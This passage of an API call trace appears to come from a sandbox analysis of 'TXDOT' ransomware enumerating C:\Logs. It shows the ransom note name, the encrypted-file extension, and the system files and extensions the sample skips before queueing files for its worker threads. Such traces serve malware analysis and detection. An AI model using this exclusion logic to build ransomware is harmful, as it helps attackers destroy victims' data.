StrCmpIW (psz1="Key Management Service.evtx", psz2="debug.txt") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="boot.ini") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="desktop.ini") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="autorun.inf") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="ntuser.dat") returned -1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="ntldr") returned -1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="ntdetect.com") returned -1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="bootfont.bin") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.799] PathFindExtensionW (pszPath="Key Management Service.evtx") returned=".evtx" [0087.799] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.799] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.812] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.812] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Key Management Service.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Key Management Service.evtx") returned="\\\\?\\C:\\Logs\\Key Management Service.evtx" [0087.812] SetEvent (hEvent=0x408) returned 1 [0087.812] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0087.812] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=".") returned 1 [0087.812] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="..") returned 1 [0087.812] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.812] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.812] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Client-Licensing-Platform%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" [0087.812] PathFindExtensionW (pszPath="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned=".evtx" [0087.812] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="bootsect.bak") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="iconcache.db") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="thumbs.db") returned -1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=" ransomware ") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=" ransom ") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="debug.txt") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="boot.ini") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="desktop.ini") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="autorun.inf") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="ntuser.dat") returned -1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="ntldr") returned -1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="ntdetect.com") returned -1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="bootfont.bin") returned 1 [0087.812] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.812] PathFindExtensionW (pszPath="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned=".evtx" [0087.812] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.812] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.821] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.821] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" [0087.821] SetEvent (hEvent=0x408) returned 1 [0087.822] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0087.822] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=".") returned 1 [0087.822] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="..") returned 1 [0087.822] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.822] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.822] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" [0087.822] PathFindExtensionW (pszPath="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned=".evtx" [0087.822] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="bootsect.bak") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="iconcache.db") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="thumbs.db") returned -1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=" ransomware ") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=" ransom ") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="debug.txt") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="boot.ini") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="desktop.ini") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="autorun.inf") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="ntuser.dat") returned -1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="ntldr") returned -1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="ntdetect.com") returned -1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="bootfont.bin") returned 1 [0087.822] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.822] PathFindExtensionW (pszPath="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned=".evtx" [0087.822] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.822] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.831] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.831] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" [0087.831] SetEvent (hEvent=0x408) returned 1 [0087.831] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0087.831] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=".") returned 1 [0087.831] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="..") returned 1 [0087.831] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.831] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.831] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" [0087.831] PathFindExtensionW (pszPath="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned=".evtx" [0087.831] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.831] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="bootsect.bak") returned 1 [0087.831] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="iconcache.db") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="thumbs.db") returned -1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=" ransomware ") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=" ransom ") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="debug.txt") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="boot.ini") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="desktop.ini") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="autorun.inf") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="ntuser.dat") returned -1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="ntldr") returned -1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="ntdetect.com") returned -1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="bootfont.bin") returned 1 [0087.832] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.832] PathFindExtensionW (pszPath="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned=".evtx" [0087.832] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.832] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.840] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.840] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" [0087.840] SetEvent (hEvent=0x408) returned 1 [0087.840] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0087.840] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=".") returned 1 [0087.840] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="..") returned 1 [0087.841] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.841] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.841] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" [0087.841] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned=".evtx" [0087.841] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="bootsect.bak") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="iconcache.db") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="thumbs.db") returned -1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=" ransomware ") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=" ransom ") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="debug.txt") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="boot.ini") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="desktop.ini") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="autorun.inf") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="ntuser.dat") returned -1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="ntldr") returned -1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="ntdetect.com") returned -1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="bootfont.bin") returned 1 [0087.841] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.841] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned=".evtx" [0087.841] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.841] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.880] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.880] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" [0087.881] SetEvent (hEvent=0x408) returned 1 [0087.881] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0087.881] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=".") returned 1 [0087.881] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="..") returned 1 [0087.881] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.881] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.881] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" [0087.881] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned=".evtx" [0087.881] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="bootsect.bak") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="iconcache.db") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="thumbs.db") returned -1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=" ransomware ") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=" ransom ") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="debug.txt") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="boot.ini") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="desktop.ini") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="autorun.inf") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="ntuser.dat") returned -1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="ntldr") returned -1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="ntdetect.com") returned -1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="bootfont.bin") returned 1 [0087.881] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.881] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned=".evtx" [0087.881] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.881] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0087.915] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.915] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" [0087.915] SetEvent (hEvent=0x3fc) returned 1 [0087.915] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0087.915] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=".") returned 1 [0087.915] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="..") returned 1 [0087.915] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.916] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.916] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" [0087.916] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned=".evtx" [0087.916] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="bootsect.bak") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="iconcache.db") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="thumbs.db") returned -1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=" ransomware ") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=" ransom ") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="debug.txt") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="boot.ini") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="desktop.ini") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="autorun.inf") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="ntuser.dat") returned -1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="ntldr") returned -1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="ntdetect.com") returned -1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="bootfont.bin") returned 1 [0087.916] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.916] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned=".evtx" [0087.916] StrStrIW 